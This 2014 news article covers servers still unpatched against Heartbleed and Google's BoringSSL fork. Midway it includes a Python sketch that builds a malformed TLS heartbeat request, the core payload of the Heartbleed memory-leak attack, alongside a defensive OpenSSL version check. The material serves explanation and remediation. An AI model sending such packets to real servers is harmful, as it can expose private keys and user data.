LinuxInsider.com

Heartbleed Flaw Goes Unpatched on 300K Servers: Report

Perhaps the most difficult obstacle to overcome in the Heartbleed security mess is getting people to apply the patches necessary to correct the flaw. Although most of the servers identified as still vulnerable to Heartbleed belong to unknown firms, a few are located in well-known ones. "No computer should be exposed to the Internet that isn't regularly patched," warned Errata CEO Robert Graham.

By Richard Adhikari TechNewsWorld ECT News Network
06/23/14 4:41 PM PT

Two months after the Heartbleed vulnerability sent frissons of fear down the spines of IT managers everywhere, 300,000 servers still remain vulnerable, Errata Security said this weekend.

That figure has remained unchanged since May.

When the flaw was announced in April, Errata found 600,000 servers vulnerable.

"The norm is to do no patches at all for some systems, no matter how easy it is to patch," Errata CEO Robert Graham told TechNewsWorld.

"If they're retirement management systems, [being left unpatched] won't be a problem," Graham said, "but if they're on a power grid, there is a problem."

What Heartbleed Is and Does

Heartbleed, which has been around since 2011, lets hackers steal information protected by the SSL/TLS encryption used to secure the Internet.

OpenSSL stores a server's private key material in the memory space used by the code handling the heartbeat messages.

The flaw can be used to reveal up to 64 KB of memory to a connected client or server per heartbeat.
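The over-read described above can be illustrated with a short Python sketch that builds, but does not send, the kind of malformed heartbeat request an attacker uses: the message claims a far larger payload than it actually carries, and a vulnerable server echoes back that many bytes of its own memory. The byte layout follows the TLS heartbeat extension (RFC 6520); the function name is illustrative.

```python
import struct

def malformed_heartbeat(claimed_len=0xFFFF):
    """Build a TLS heartbeat request whose claimed payload length
    (claimed_len) exceeds the payload it actually carries (zero bytes).
    A vulnerable OpenSSL server trusts claimed_len and replies with
    that many bytes of process memory -- up to 64 KB per heartbeat."""
    # Heartbeat message: type 0x01 (request), 2-byte claimed payload
    # length, and no actual payload bytes at all.
    hb = struct.pack(">BH", 0x01, claimed_len)
    # TLS record header: content type 0x18 (heartbeat), version TLS 1.1
    # (0x0302), then the true length of the heartbeat message (3 bytes).
    record = struct.pack(">BHH", 0x18, 0x0302, len(hb)) + hb
    return record

pkt = malformed_heartbeat()
```

The mismatch is the whole bug: the record honestly reports a 3-byte heartbeat message, while the inner field claims a 65,535-byte payload that was never sent.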

To remediate, administrators must apply the patched OpenSSL release and then review their certificates, reissuing and revoking any whose private keys may have been exposed.
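As a rough triage aid, a sketch and not an authoritative scanner, an administrator could parse the banner printed by `openssl version` and flag the affected branch: only 1.0.1 through 1.0.1f shipped the bug, while 1.0.1g and later, and other branches, did not. One caveat assumed away here: distributions often backport the fix without bumping the version letter, so a match means "investigate further," not "vulnerable."

```python
import re

VULNERABLE_LETTERS = set("abcdef")  # 1.0.1 through 1.0.1f shipped the bug

def is_possibly_vulnerable(banner):
    """Rough check of an `openssl version` banner for Heartbleed
    exposure. Returns True only for the 1.0.1 branch up to 1.0.1f.
    Distro backports can fix the flaw without changing the letter,
    so True means 'needs investigation', not proof of exposure."""
    m = re.search(r"OpenSSL (\d+\.\d+\.\d+)([a-z]?)", banner)
    if not m:
        return False
    base, letter = m.groups()
    if base != "1.0.1":
        return False
    # Bare "1.0.1" and letters a-f are affected; g and later are fixed.
    return letter == "" or letter in VULNERABLE_LETTERS
```

Even where this check comes back clean, certificates issued while a server ran a vulnerable build should still be reviewed, since the flaw leaked key material silently.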

A Drop in the Ocean?

While 300,000 servers seems like a lot, "it isn't that big a number considering how big the Internet is," Steve Marquess, president of the OpenSSL Foundation, told TechNewsWorld.

Exactly how many servers are out there may never be known, because there is no uniform way of counting them. For example, Errata's Graham estimates that about 30 million servers support SSL, while Netcraft, which tracks domain names, puts the figure at about 2.8 million.

"There's always going to be a certain number of systems that are going to be neglected," Marquess said. "You're never going to get that number down to zero. Look, there are still Windows 95 computers out there."

It is possible that some of the 300,000 unpatched servers Errata discovered last month have since been patched, while newly vulnerable servers have taken their place, keeping the total constant.

Most of the servers belong to unknown firms, but a few are located in well-known ones, Errata's Graham said, adding, "No computer should be exposed to the Internet that isn't regularly patched."

The Advent of BoringSSL

Meanwhile, Google security engineer Adam Langley has announced that the company is changing the way it works with OpenSSL code.

Google has used patches on top of OpenSSL for years, he said.

Some have been accepted into the main OpenSSL repository, but many don't mesh with OpenSSL's guarantee of application programming interface (API) and application binary interface (ABI) stability, noted Langley, and many are "a little too experimental."

Things have grown "very complex," he said, with more than 70 patches spread across multiple code bases for Android, Chrome and other products, each of which is beginning to need a different subset of those patches.

Going forward, Google will import changes from OpenSSL rather than write code on top of those patches, said Langley. The result, called "BoringSSL" for now, soon will begin appearing in the Chromium repository, and later in Android, as well as in Google's internal systems.

Again, there are no guarantees of API or ABI stability with this code.

No Threat to OpenSSL

Google is "not aiming to replace OpenSSL as an open source project. We will still be sending them bug fixes when we find them," Langley said.

"Google has extremely extensive worldwide operations and has had some very smart people doing extensive customization for some time," OpenSSL's Marquess said. "We work closely with those people, and I don't see any changes at all."

Further, the company will continue to fund the Linux Foundation's Core Infrastructure Initiative, a multimillion-dollar project set up by several vendors to fund open source products critical to core computing functions.


Richard Adhikari has written about high-tech for leading industry publications since the 1990s and wonders where it's all leading to. Will implanted RFID chips in humans be the Mark of the Beast? Will nanotech solve our coming food crisis? Does Sturgeon's Law still hold true? You can connect with Richard on Google+.

